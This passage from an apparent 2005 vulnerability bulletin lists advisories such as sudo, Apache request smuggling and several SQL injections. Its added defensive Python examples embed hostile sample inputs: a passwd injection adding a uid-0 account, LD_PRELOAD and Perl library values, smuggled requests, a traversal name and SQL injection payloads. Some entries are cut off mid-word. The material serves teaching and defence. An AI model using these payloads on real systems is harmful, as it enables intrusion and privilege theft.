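    if "\n" in value or "\r" in value:
        return "line break would start a new passwd record"
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return "control character"
    if len(value) > GECOS_MAX_LEN:
        return "too long"
    return None


def build_gecos(full_name: str, room: str, work_phone: str, home_phone: str) -> str:
    """Join the four sub-fields, refusing anything that would corrupt the
    passwd record or shift the sub-fields around."""
    parts = (("name", full_name), ("room", room),
             ("work phone", work_phone), ("home phone", home_phone))
    for label, part in parts:
        if "," in part:
            raise ValueError(f"{label}: comma is the sub-field separator")
        problem = gecos_problem(part)
        if problem:
            raise ValueError(f"{label}: {problem}")
    return ",".join(part for _, part in parts)


def passwd_record(user: str, uid: int, gid: int, gecos: str, home: str, shell: str) -> str:
    """A passwd line with GECOS pasted in verbatim: the unchecked path."""
    return ":".join((user, "x", str(uid), str(gid), gecos, home, shell))


def parse_passwd(text: str) -> list:
    """Read records back the way a tolerant parser would (first 7 fields)."""
    records = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7:
            records.append({"user": fields[0], "uid": fields[2],
                            "gecos": fields[4], "shell": fields[6]})
    return records


# Constructed attacker input: closes the current record and appends a
# uid-0 account on the next line.
INJECTED = "Eve:/home/eve:/bin/sh\nbackdoor::0:0::/root:/bin/sh"
```

With `passwd_record("eve", 1000, 1000, INJECTED, "/home/eve", "/bin/sh")` the file gains a second record whose uid is 0; `build_gecos` refuses the same input at the colon before anything is written.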
XMail 1.21, 1.0; | A buffer overflow vulnerability has been reported in certain uses of the 'readdir_r' function, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. Currently we are not aware of any exploits for this vulnerability. | Multiple Vendor 'ReadDir_R' Buffer Overflow | High | Security Focus, Bugtraq ID: 15259, November 1, 2005 |
NetBSD 2.0.2 & prior | Several vulnerabilities have been reported that could lead to a Denial of Service, sensitive information disclosure, or unauthorized access: a vulnerability was reported because the IPsec-AH calculation is always based on the same key in AES-XCBC-MAC; a vulnerability was reported because a malicious user can specify negative offsets when reading the message buffer to read arbitrary kernel memory; a vulnerability was reported in the 'imake(1)' utility due to the insecure creation of temporary files; and a vulnerability was reported in the 'sh(1)' command. Update information available at: http://www.NetBSD. There is no exploit code required. | NetBSD Kernel, Networking & Application Code Denial of Service, Information Disclosure or Elevated Privileges | Medium | Security Tracker Alert ID: 1015132, November 1, 2005 |
OpenVPN 2.0-2.0.2 | Several vulnerabilities have been reported: a format string vulnerability was reported in 'options.c' when handling command options in the 'foreign_option()' function, which could let a remote malicious user execute arbitrary code; and a remote Denial of Service vulnerability was reported due to a NULL pointer dereferencing error in the OpenVPN server when running in TCP mode. Updates available at: OpenPKG: SUSE: Debian: Gentoo: Mandriva: Currently we are not aware of any exploits for these vulnerabilities. | OpenVPN Client Remote Format String & Denial of Service | High | Secunia Advisory: SA17376, November 1, 2005 OpenPKG Security Advisory, OpenPKG- SUSE Security Summary Report, Debian Security Advisory, Gentoo Linux Security Advisory, GLSA Mandriva Linux Security Advisory, MDKSA-2005:206, November 8, 2005 |
phpMyAdmin 2.6 .0-2.6.3, 2.5 .0-2.5.7, 2.4 .0, 2.3.2, 2.3.1, 2.2 -2.2.6, 2.1-2.1 .2, 2.0-2.0.5 | Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability has been reported in 'libraries/auth/cookie. Upgrades available at: Debian: SUSE: There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPMyAdmin Cross-Site Scripting | Medium | Secunia Advisory: SA16605, August 29, 2005 Debian Security Advisory, DSA 880-1, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
phpMyAdmin 2.x | Several vulnerabilities have been reported: a vulnerability was reported due to insufficient verification of certain configuration parameters, which could let a remote malicious user include arbitrary files; and a Cross-Site Scripting vulnerability was reported in 'left.php,' 'queryframe.php,' and 'server_databases.php' due to insufficient sanitization of unspecified input, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: Gentoo: Debian: SUSE: There is no exploit code required; however, a Proof of Concept exploit has been published. | phpMyAdmin Local File Inclusion & Cross-Site Scripting | Medium | Secunia Advisory: SA17289, October 24, 2005 Gentoo Linux Security Advisory, GLSA 200510-21, October 25, 2005 Debian Security Advisory, DSA 880-1, November 2, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
Squid Web Proxy Cache 2.5 & prior | A remote Denial of Service vulnerability has been reported in the 'storeBuffer()' function when handling aborted requests. Patches available at: Gentoo: OpenPKG: Mandriva: Debian: Ubuntu: RedHat: SUSE: SGI: Conectiva: Debian: SUSE: TurboLinux: SCO: Debian: Currently we are not aware of any exploits for this vulnerability. | Squid Aborted Requests Remote Denial of Service | Low | Security Tracker Alert ID: 1014864, September 7, 2005 Gentoo Linux Security Advisory GLSA 200509-06, September 7, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.021, September 10, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:162, September 12, 2005 Debian Security Advisory, DSA 809-1, September 13, 2005 Ubuntu Security Notice, USN-183-1, September 13, 2005 RedHat Security Advisory, RHSA-2005:766-7, September 15, 2005 SUSE Security Announcement, SUSE-SA:2005:053, September 16, 2005 SGI Security Advisory, 20050903-02-U, September 28, 2005 Conectiva Linux Announcement, CLSA-2005:1016, September 28, 2005 Debian Security Advisory, DSA 809-2, September 30, 2005 SUSE Security Summary Report, Turbolinux Security Advisory, TLSA-2005-96, October 3, 2005 SCO Security Advisory, SCOSA-2005.44, November 1, 2005 Debian Security Advisory, DSA 809-3, November 7, 2005 |
Squid Web Proxy Cache 2.5 .STABLE1-STABLE 10, 2.4 .STABLE6 & 7, STABLE 2, 2.4, 2.3 STABLE 4&5, 2.1 Patch 2, 2.0 Patch 2 | A remote Denial of Service vulnerability has been reported in '/squid/src/ssl.c' when a malicious user triggers a segmentation fault in the 'sslConnectTimeout()' function. Patches available at: Trustix: OpenPKG: Mandriva: Ubuntu: Debian: RedHat: SUSE: SGI: Conectiva: SUSE: SCO: There is no exploit code required. | Squid 'sslConnect | Low | Security Tracker Alert ID: 1014846, September 2, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0047, September 9, 2005 OpenPKG Security Advisory, OpenPKG-SA-2005.021, September 10, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:162, September 12, 2005 Ubuntu Security Notice, USN-183-1, September 13, 2005 Debian Security Advisory, DSA 809-1, September 13, 2005 RedHat Security Advisory, RHSA-2005:766-7, September 15, 2005 SUSE Security Announcement, SUSE-SA:2005:053, September 16, 2005 SGI Security Advisory, 20050903-02-U, September 28, 2005 Conectiva Linux Announcement, CLSA-2005:1016, September 28, 2005 SUSE Security Summary Report, SCO Security Advisory, SCOSA-2005.44, November 1, 2005 |
Squid 2.x | A remote Denial of Service vulnerability has been reported when handling certain FTP server responses. Patches available at: Fedora: Mandriva: SCO: SUSE: There is no exploit code required. | Squid FTP Server Response Handling Remote Denial of Service | Low | Secunia Advisory: SA17271, October 20, 2005 Fedora Update Notifications, Mandriva Linux Security Advisory, MDKSA-2005:195, October 26, 2005 SCO Security Advisory, SCOSA-2005.44, November 1, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
Sylpheed 2.0-2.0.3, 1.0.0-1.0.5 | A buffer overflow vulnerability has been reported in 'ldif.c' due to a boundary error in the 'ldif_ Upgrades available at: Currently we are not aware of any exploits for this vulnerability. | Sylpheed LDIF Import Buffer Overflow | Medium | Bugtraq ID: 15363, November 9, 2005 |
Sudo 1.x | A vulnerability has been reported in the environment cleaning due to insufficient sanitization, which could let a malicious user obtain elevated privileges. Debian: Mandriva: Ubuntu: SUSE: There is no exploit code required. | Todd Miller Sudo Local Elevated Privileges | Medium | Debian Security Advisory, DSA 870-1, October 25, 2005 Mandriva Linux Security Advisory, MDKSA-2005:201, October 27, 2005 Ubuntu Security Notice, USN-213-1, October 28, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
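Environment cleaning at a privilege boundary fails in exactly the way the sudo entry above describes when it is done by deny list: a variable the list does not name passes through untouched. The block below is an added example, not sudo's own env handling; it contrasts a deny-list scrub with an allow-list scrub over a constructed environment, including an interpreter library-path variable of the kind a deny list tends to miss. The variable names in the lists and the sample values are this example's assumptions.

```python
"""Environment cleaning before a privilege boundary: deny list vs allow list.

Added example, not sudo's env.c. Lists and sample environment are constructed."""
import re

# Deny list: the variables setuid wrappers have traditionally stripped.
DENY_EXACT = {"IFS", "CDPATH", "ENV", "BASH_ENV", "SHELLOPTS", "KRB_CONF",
              "LOCALDOMAIN", "RES_OPTIONS", "HOSTALIASES", "NLSPATH",
              "PATH_LOCALE", "TERMINFO", "TERMPATH", "TERMCAP"}
DENY_PREFIX = ("LD_", "_RLD", "DYLD_", "LIBPATH", "SHLIB_PATH")

# Allow list: only variables with a known, harmless role survive, and only
# with values free of control characters.
ALLOW = {"HOME", "PATH", "SHELL", "TERM", "USER", "LOGNAME", "LANG",
         "LC_ALL", "DISPLAY", "TZ"}
_CLEAN_VALUE = re.compile(r"[^\x00-\x1f\x7f]*")


def scrub_denylist(env: dict) -> dict:
    """Drop known-dangerous names; everything else is trusted by default."""
    return {k: v for k, v in env.items()
            if k not in DENY_EXACT and not k.startswith(DENY_PREFIX)}


def scrub_allowlist(env: dict, allow=frozenset(ALLOW)) -> dict:
    """Keep only named, well-formed variables; everything else is dropped."""
    out = {}
    for k, v in env.items():
        if k not in allow or _CLEAN_VALUE.fullmatch(v) is None:
            continue
        if v.startswith("() "):          # exported shell function body
            continue
        out[k] = v
    return out


def leaked_through(env: dict) -> list:
    """Names the deny list keeps but the allow list rejects: the gap an
    attacker looks for."""
    return sorted(set(scrub_denylist(env)) - set(scrub_allowlist(env)))


# Constructed sample environment of an unprivileged caller.
SAMPLE_ENV = {
    "PATH": "/usr/bin:/bin",
    "HOME": "/home/alice",
    "TERM": "xterm",
    "USER": "alice",
    "LD_PRELOAD": "/tmp/hook.so",      # dropped by both scrubs
    "IFS": " \t\n",                     # dropped by both scrubs
    "PERL5OPT": "-Mblib=/tmp/evil",    # not on the deny list: survives it
    "PERLLIB": "/tmp/evil",            # not on the deny list: survives it
    "LANG": "en_US\n",                 # allowed name, malformed value
}
```

Extending the deny list with the two Perl variables fixes only this sample; the allow list needs no change because an unknown name is never trusted.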
UW-imapd imap-2004c1 | A buffer overflow has been reported in UW-imapd that could let remote malicious users cause a Denial of Service or execute arbitrary code. Upgrade to version imap-2004g: Trustix: Debian: Gentoo: SUSE: Mandriva: Slackware: Currently we are not aware of any exploits for this vulnerability. | UW-imapd Denial of Service and Arbitrary Code Execution | High | Secunia Advisory: SA17062, October 5, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0055, October 7, 2005 Debian Security Advisory, DSA 861-1, October 11, 2005 Gentoo Linux Security Advisory, GLSA 200510-10, October 11, 2005 SUSE Security Summary Report, SUSE-SR:2005:023, October 14, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:189 & 194, October 21 & 26, 2005 Slackware Security Advisory, SSA:2005-310-06, November 7, 2005 |
up-imapproxy 1.2.4, 1.2.3 | A format string vulnerability has been reported in the 'ParseBannerAnd Debian: A Proof of Concept exploit script has been published. | up-imapproxy Format String | High | Debian Security Advisory DSA 852-1, October 9, 2005 Security Focus, Bugtraq ID: 15048, November 3, 2005 |
VERITAS Cluster Server 2.x, 3.x, 4.x, Storage Foundation 2.x, 3.x, 4.x, Storage Foundation Cluster File System 4.x, Storage Foundation for Database (DB2, Oracle and Sybase) 3.x, 4.x, Storage Foundation for Oracle Real Application Clusters (RAC) 3.x, 4.x | A buffer overflow vulnerability has been reported in the 'ha' command when handling the 'VCSI18N_LANG' environment variable, which could let a malicious user execute arbitrary code with root privileges. Patches available at: Currently we are not aware of any exploits for this vulnerability. | VERITAS Cluster Server for UNIX Buffer Overflow | High | Symantec Security Advisory, SYM05-023, November 8, 2005 |
Zope 2.6-2.8.1 | A vulnerability has been reported in 'docutils' due to an unspecified error and affects all instances which exposes 'Restructured Hotfix available at: Gentoo: SUSE: Currently we are not aware of any exploits for this vulnerability. | Zope 'Restructured | Not Specified | Zope Security Alert, October 12, 2005 Gentoo Linux Security Advisory, GLSA 200510-20, October 25, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
Multiple Operating Systems - Windows / UNIX / Linux / Other | ||||
Vendor & Software Name | Vulnerability - Impact Patches - Workarounds Attack Scripts | Common Name / CVE Reference | Risk | Source |
Apache | A vulnerability has been reported in Apache which can be exploited by remote malicious users to smuggle HTTP requests past a proxy or cache that interprets the Content-Length and Transfer-Encoding headers of a request differently from the server behind it. Patches available from: Conectiva, Fedora, Mandriva, Ubuntu (http://security.ubuntu.com/), TurboLinux, SGI, SuSE (ftp://ftp.suse.com/pub/suse/), Debian, Ubuntu, SGI, Trustix, Slackware. IBM has released fixes for Hardware Management Console addressing this issue. Users should contact IBM for further information. Currently we are not aware of any exploits for this vulnerability. | Apache HTTP Request Smuggling Vulnerability CVE-2005-1268 | Medium | Secunia, Advisory: SA14530, July 26, 2005 Conectiva, CLSA-2005:982, July 25, 2005 Fedora Update Notification Mandriva Linux Security Update Advisory, MDKSA-2005:129, August 3, 2005 Ubuntu Security Notice, USN-160-1, August 04, 2005 Turbolinux Security Advisory, TLSA-2005-81, August 9, 2005 SGI Security Advisory, 20050802-01-U, August 15, 2005 SUSE Security Announcement, SUSE-SA:2005:046, August 16, 2005 Debian Security Advisory DSA 803-1, September 8, 2005 Ubuntu Security Notice, USN-160-2, September 07, 2005 SGI Security Advisory, 20050901-01-U, September 7, 2005 Security Focus, Bugtraq ID: 14106, September 21, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 Slackware Security Advisory, SSA:2005-310-04, November 7, 2005 |
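Request smuggling works because two hops disagree about where one request ends and the next begins, and that disagreement is visible in the headers before any body is parsed. The block below is an added example, not Apache code: it parses a raw request buffer, keeping header names and values exactly as sent, and reports the combinations worth alerting on (conflicting Content-Length values, Content-Length together with Transfer-Encoding, a non-canonical "chunked", and bytes left over past the declared length). The sample requests are constructed; the finding strings and function names are this example's own.

```python
"""Header checks that flag HTTP request smuggling attempts.

Added example, not Apache code. The sample requests are constructed."""


def parse_request(raw: bytes):
    """Split a raw request into request line, [(raw name, raw value)] and
    body. Names and values are kept as sent so oddities stay visible."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name, value))
    return lines[0], headers, body


def smuggling_indicators(raw: bytes) -> list:
    """Return a list of reasons this request may be parsed two ways."""
    _, headers, body = parse_request(raw)
    findings = []
    if any(name != name.strip() for name, _ in headers):
        findings.append("whitespace around a header name")
    cl = [v.strip() for n, v in headers if n.strip().lower() == "content-length"]
    te = [v for n, v in headers if n.strip().lower() == "transfer-encoding"]
    if any(not v.isdigit() for v in cl):
        findings.append("non-numeric Content-Length")
    if len(set(cl)) > 1:
        findings.append("conflicting Content-Length values")
    if cl and te:
        findings.append("both Content-Length and Transfer-Encoding present")
    for v in te:
        # Anything but the canonical " chunked" (odd case, extra spaces,
        # a list) is honoured by some parsers and ignored by others.
        if v != " chunked" and "chunked" in v.lower():
            findings.append(f"non-canonical Transfer-Encoding: {v!r}")
    if cl and cl[0].isdigit() and len(body) > int(cl[0]):
        extra = len(body) - int(cl[0])
        findings.append(f"{extra} bytes beyond the declared Content-Length")
    return findings


# Constructed sample requests.
BENIGN = (b"POST /upload HTTP/1.1\r\nHost: example.test\r\n"
          b"Content-Length: 5\r\n\r\nhello")
CL_TE = (b"POST /upload HTTP/1.1\r\nHost: example.test\r\n"
         b"Content-Length: 4\r\nTransfer-Encoding: Chunked\r\n\r\n"
         b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.test\r\n\r\n")
DOUBLE_CL = (b"POST /upload HTTP/1.1\r\nHost: example.test\r\n"
             b"Content-Length: 0\r\nContent-Length: 43\r\n\r\n"
             b"GET /admin HTTP/1.1\r\nHost: example.test\r\n\r\n")
```

The hardened behaviour on any finding is to reject the request with a 400 rather than guess; a proxy that silently picks one interpretation is the hop that gets desynchronised.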
Tomcat 5.5-5.5.12 | A remote Denial of Service vulnerability has been reported due to the inefficient generation of directory listing for web directories that have a large number of files. No workaround or patch available at time of publishing. There is no exploit code required. | Apache Tomcat Remote Denial of Service | Low | Security Tracker Alert ID: 1015147, November 3, 2005 |
QuickTime Player 7.0-7.0.2, 6.5-6.5.2, 6.1, 6, 5.0.2 | Multiple vulnerabilities have been reported: an integer overflow vulnerability was reported when handling a 'Pascal' style string loading a '.mov' video file, which could let a remote malicious user cause a Denial of Service and potentially execute arbitrary code; an integer overflow vulnerability was reported when handling certain movie attributes when loading a '.mov' video file, which could let a remote malicious user potentially execute arbitrary code; a vulnerability was reported due to a NULL pointer dereferencing error when handling certain missing video file movie attributes, which could let a remote malicious user cause a Denial of Service; and a vulnerability was reported in the QuickTime PictureViewer due to a boundary error when decompressing PICT data, which could let a remote malicious user overwrite memory and potentially execute arbitrary code. Updates available at: Currently we are not aware of any exploits for these vulnerabilities. | Apple QuickTime Player Integer & Buffer Overflows | High | Security Tracker Alert ID: 1015152, November 4, 2005 |
ATutor 1.5.1 pl2 | An SQL injection vulnerability has been reported in 'registration.php' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit script has been published. | ATutor SQL Injection | Medium | Security Focus, Bugtraq ID: 15355, November 8, 2005 |
vCard Pro 3.1 | An SQL injection vulnerability has been reported in 'addrbook.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Belchior Foundry vCard Pro SQL Injection | Medium | Security Focus, Bugtraq ID: 15254, November 1, 2005 |
Cisco 4000 Series Airespace Wireless LAN Controller 3.1.59.24, 2000 Series Airespace Wireless LAN Controller 3.1.59.24 | A vulnerability has been reported in controllers that are in the Lightweight Access Point Protocol (LWAPP) mode of operation because unencrypted traffic is accepted even when configured to encrypt traffic, which could let an unauthorized remote malicious user send unencrypted network packets to a secure network by spoofing the MAC address of another host that has already authenticated. Upgrade information available at: This could be exploited with a publicly available packet crafting or MAC address spoofing utility. | Cisco Airespace Wireless LAN Controller Unencrypted Connections | Medium | Cisco Security Advisory: 68034, November 2, 2005 |
Cisco IOS 10.x, 11.x, 12.x, R11.x, R12.x | A vulnerability has been reported in the check that validates system memory for heap corruption before the internal operating system timers run: a heap-based buffer overflow that evades this check could let a remote malicious user execute arbitrary code. Update information available at: Currently we are not aware of any exploits for this vulnerability. | Cisco IOS System Timers Heap Buffer Overflow | High | Cisco Security Advisory: 68064 Rev 1.0-1.2, Updated November 4, 2005 |
CiscoWorks Management Center for IPS Sensors (IPSMC) 2.1 | A vulnerability has been reported due to an error in the Cisco IOS IPS (Intrusion Prevention System) configuration file that is generated by the IPS MC and deployed to IOS IPS devices, which could potentially allow malicious traffic to pass through. Patch information available at: Rev 1.1: Updated information in the Software Versions and Fixes section. There is no exploit code required. | Cisco Management Center for IPS Sensors Signature Disable | Medium | Cisco Security Advisory, 68065, November 1, 2005 Cisco Security Advisory, 68065 Rev1.1, Updated November 3, 2005 |
CuteNews 1.4.1 | A Directory Traversal vulnerability has been reported in 'show_archives.php' and 'show_news.php' due to insufficient verification of the 'template' parameter before used to include files, which could let a remote malicious user obtain sensitive information and execute arbitrary PHP code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | CutePHP CuteNews Directory Traversal & PHP Code Execution | High | Security Focus, Bugtraq ID: 15295, November 3, 2005 |
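The 'template' parameter in the entry above is used to build an include path, so the fix is to treat it as a bare file name and prove the result stays inside the template directory. The block below is an added example, not CuteNews code: it builds a throwaway directory tree, resolves several candidate names the safe way, and contrasts the unchecked concatenation. The NUL-truncation modelled in `unsafe_include_path` reflects how C string APIs in PHP releases of the period cut a path at the first NUL byte; that, the directory layout and all function names are this example's assumptions, not details from the report.

```python
"""Resolve a user-supplied template name to a file inside a fixed directory.

Added example, not CuteNews code. The directory tree is created in a
temporary location so the block runs stand-alone."""
import os
import shutil
import tempfile

TEMPLATE_SUFFIX = ".tpl"


def resolve_template(template_dir: str, name: str):
    """Return the absolute path of the template, or None unless NAME is a
    plain file name that resolves (symlinks followed) inside TEMPLATE_DIR."""
    if not name or "\x00" in name:
        return None
    if name != os.path.basename(name):        # any separator component
        return None
    if name.startswith("."):                  # hidden files, ".", ".."
        return None
    base = os.path.realpath(template_dir)
    candidate = os.path.realpath(os.path.join(base, name + TEMPLATE_SUFFIX))
    if os.path.dirname(candidate) != base:    # a symlink escaped the directory
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def unsafe_include_path(template_dir: str, name: str) -> str:
    """The pattern the report describes: the parameter is pasted into the
    include path unchecked. Truncating at NUL models the C string behaviour
    of PHP releases of the period (assumption, not from the report)."""
    return os.path.join(template_dir, name + TEMPLATE_SUFFIX).split("\x00")[0]


def demo() -> dict:
    """Build templates/default.tpl, a config file outside the directory and
    a symlink pointing at it, then try several 'template' values."""
    root = tempfile.mkdtemp()
    try:
        tdir = os.path.join(root, "templates")
        os.mkdir(tdir)
        with open(os.path.join(tdir, "default.tpl"), "w") as fh:
            fh.write("<html>constructed template</html>")
        secret = os.path.join(root, "config.php")
        with open(secret, "w") as fh:
            fh.write("<?php $db_pass = 'constructed'; ?>")
        os.symlink(secret, os.path.join(tdir, "link.tpl"))
        tries = ["default", "../config", "../config.php\x00", "link", ".hidden"]
        resolved = {t: resolve_template(tdir, t) for t in tries}
        unchecked = unsafe_include_path(tdir, "../config.php\x00")
        return {"resolved": {t: (p is not None) for t, p in resolved.items()},
                "default_is_file": resolved["default"] is not None
                                   and resolved["default"].endswith("default.tpl"),
                "unsafe_reads_config": os.path.isfile(unchecked)}
    finally:
        shutil.rmtree(root)
```

Checking `dirname(realpath(candidate)) == realpath(base)` is what catches the symlink case; a prefix test on the unresolved string would pass `link.tpl` and still read the file outside the directory.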
Elite Forum 1.0.0.0 | A vulnerability has been reported due to insufficient sanitization of input when posting a reply, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required. | Elite Forum HTML Injection | Medium | h4cky0u.org Advisory, HYSA-2005-009, November 1, 2005 |
F-Prot Antivirus for Windows, Solaris, Linux and BSD 4.4.2, 3.12 d, 3.12 b | A vulnerability has been reported because ZIP archives whose header declares a version value greater than 15 are not decompressed and scanned, which could let a remote malicious user bypass the scanning engine. No workaround or patch available at time of publishing. There is no exploit code required. | F-Prot Antivirus ZIP Attachment Version Scan Bypass | Medium | Security Tracker Alert ID: 1015148, November 3, 2005 |
Internet Gatekeeper 6.4.0-6.42, Anti-Virus for MS Exchange 6.40 | A Directory Traversal vulnerability has been reported in the Web Console, which could let a remote malicious user obtain sensitive information. Update information available at: There is no exploit code required. | F-Secure Web Console Directory Traversal | Medium | F-Secure Security Bulletin FSC-2005-2, November 2, 2005 |
Gallery 2.4 | An SQL injection vulnerability has been reported in 'ShowGallery.php' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | Gallery SQL Injection | Medium | Security Focus, Bugtraq ID: 15313, November 4, 2005 |
Lotus Domino 6.5.0-6.5.4, 6.0-6.0.4, Lotus Domino Web Access (iNotes) 6.x | Multiple vulnerabilities have been reported: a remote Denial of Service vulnerability was reported when handling mail rules creation in DWA (Domino Web Access); a remote Denial of Service vulnerability was reported in the Out-Of-Office Agent when processing a message with a From field greater than 256 characters; an unspecified vulnerability was reported in Agents and in MIME to CD conversion; a remote Denial of Service vulnerability was reported when handling invalid HTTP addresses in DWA due to an unspecified error; a remote Denial of Service vulnerability was reported in the mail router when handling a document in the user's mail box that contains an invalid attachment; and a remote Denial of Service vulnerability was reported in Update Task when updating views in the Domino Directory. Updates available at: Some of these vulnerabilities do not require exploit code. | IBM Lotus Domino/Notes Multiple Vulnerabilities | Low | Secunia Advisory: SA17429, November 4, 2005 |
Tivoli Access Manager for Business Integration 5.x, Tivoli Access Manager for e-business 5.x, Tivoli Access Manager for Operating Systems 5.x, Tivoli Directory Integrator 5.x, 6.x, Tivoli Directory Server 5.x, 6.x, Tivoli Federated Identity Manager 6.x, Tivoli Identity Manager 4.x | A vulnerability has been reported in the server's 'slapd' daemon due to an unspecified error, which could let a remote malicious user obtain unauthorized access and change, modify and/or delete directory data. Update information available at: Currently we are not aware of any exploits for this vulnerability. | IBM Tivoli Directory Server Security Bypass | Medium | IBM Security Advisory, November 9, 2005 |
Websphere Application Server 5.1.1 .4, 5.1.1 .3 | A vulnerability has been reported in the log file when tracing for the session manager is enabled because the 'QueryString' is logged when a URL is encoded, which could let a remote malicious user obtain sensitive information. Update information available at: There is no exploit code required. | IBM WebSphere Application Server Information Disclosure | Medium | Security Tracker Alert ID: 1015134, November 2, 2005 |
ibProArcade 2.5.2 | An SQL injection vulnerability has been reported in the 'report' module due to insufficient sanitization of input in the 'user' parameter in 'index.php' before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. Update available at: A Proof of Concept exploit has been published. | ibProArcade Module SQL Injection | Medium | Secunia Advisory: SA17457, November 7, 2005 |
Invision Board 2.1 | Several vulnerabilities have been reported: Cross-Site Scripting vulnerabilities were reported due to insufficient sanitization of unspecified input in the administration interface before returning it to the user, which could let a remote malicious user execute arbitrary HTML and script code; and multiple HTML injection vulnerabilities were reported due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | Invision Power Board Multiple Cross-Site Scripting & HTML Injection | Medium | Security Focus, Bugtraq ID: 15344 & 15345, November 7, 2005 |
VBulletin 3.0-3.0.9, 2.3.0-2.3.4, 2.2.0-2.2.9, 2.0.3, 2.0 rc2 & rc3, 1.0.1 lite | An input validation vulnerability has been reported in the image upload handling, which could let a remote malicious user execute arbitrary HTML and script code. Update available at: There is no exploit code required. | vBulletin Image Upload Input Validation | Medium | Security Focus, Bugtraq ID: 15296, November 3, 2005 |
FlatFrag 0.3 & prior | Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported due to insufficient bounds checking of user-supplied data before copying it to an insufficiently sized memory buffer, which could let a remote malicious user execute arbitrary code; and a remote Denial of Service vulnerability was reported due to an attempt to dereference a NULL pointer. No workaround or patch available at time of publishing. A Proof of Concept exploit has been published. | Johannes F. Kuhlmann FlatFrag Remote Buffer Overflow & Denial of Service | High | Security Focus, Bugtraq ID: 15287, November 2, 2005 |
JPortal Web Portal 2.3.1, 2.2.1 | Multiple SQL injection vulnerabilities have been reported due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | JPortal Multiple SQL Injection | Medium | Security Focus, Bugtraq ID: 15324, November 4, 2005 |
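The SQL injection entries in this section (ATutor, vCard Pro, Gallery, ibProArcade, JPortal) all describe the same defect: a request parameter concatenated into a query string. The block below is one added example serving all of them; it is not code from any of those projects. It runs the string-built lookup and its parameterised replacement against an in-memory SQLite table, for both a quoted string parameter and an unquoted numeric one, so the difference is visible in the rows returned. The table, column names, rows and payloads are constructed for the demonstration.

```python
"""String-built versus parameterised SQL against an in-memory SQLite table.

Added example serving the SQL injection entries in this section; not code
from ATutor, vCard Pro, Gallery, ibProArcade or JPortal. Schema and data
are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE members(id INTEGER PRIMARY KEY, login TEXT,
                             email TEXT, is_admin INTEGER);
        INSERT INTO members VALUES (1, 'alice', 'alice@example.test', 1);
        INSERT INTO members VALUES (2, 'bob', 'bob@example.test', 0);
    """)
    return con


def lookup_unsafe(con, login: str) -> list:
    """The pattern behind the reports: the parameter is pasted into the
    query text, quotes and all."""
    sql = "SELECT login, email FROM members WHERE login = '%s'" % login
    return con.execute(sql).fetchall()


def lookup_safe(con, login: str) -> list:
    """Placeholder binding: the value never becomes part of the SQL text."""
    return con.execute("SELECT login, email FROM members WHERE login = ?",
                       (login,)).fetchall()


def by_id_unsafe(con, raw_id: str) -> list:
    """Numeric parameters need no quote to break out of."""
    sql = "SELECT login, email FROM members WHERE id = %s" % raw_id
    return con.execute(sql).fetchall()


def by_id_safe(con, raw_id: str) -> list:
    """Validate the type first, then bind; garbage never reaches the query."""
    try:
        member_id = int(raw_id)
    except ValueError:
        return []
    return con.execute("SELECT login, email FROM members WHERE id = ?",
                       (member_id,)).fetchall()


# Constructed payloads of the kind published as proofs of concept.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "' UNION SELECT login, is_admin FROM members --"
NUMERIC = "2 OR 1=1"
```

Escaping quotes in the string path (the "sanitization" the reports say is missing) would stop the first two payloads but not the numeric one, which is why binding plus type validation, rather than escaping, is the fix.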
Flash 7.0.19 .0, 7.0 r19, 6.0.79 .0, 6.0.65 .0, 6.0.47 .0, 6.0.40 .0, 6.0.29 .0, 6.0 | A vulnerability has been reported due to insufficient validation of the frame type identifier that is read from a SWF file, which could let a remote malicious user execute arbitrary code. Update information available at: An exploit has been published. | Macromedia Flash Array Index Remote Arbitrary Code Execution | High | Macromedia Security Advisory, MPSB05-07, November 5, 2005 |
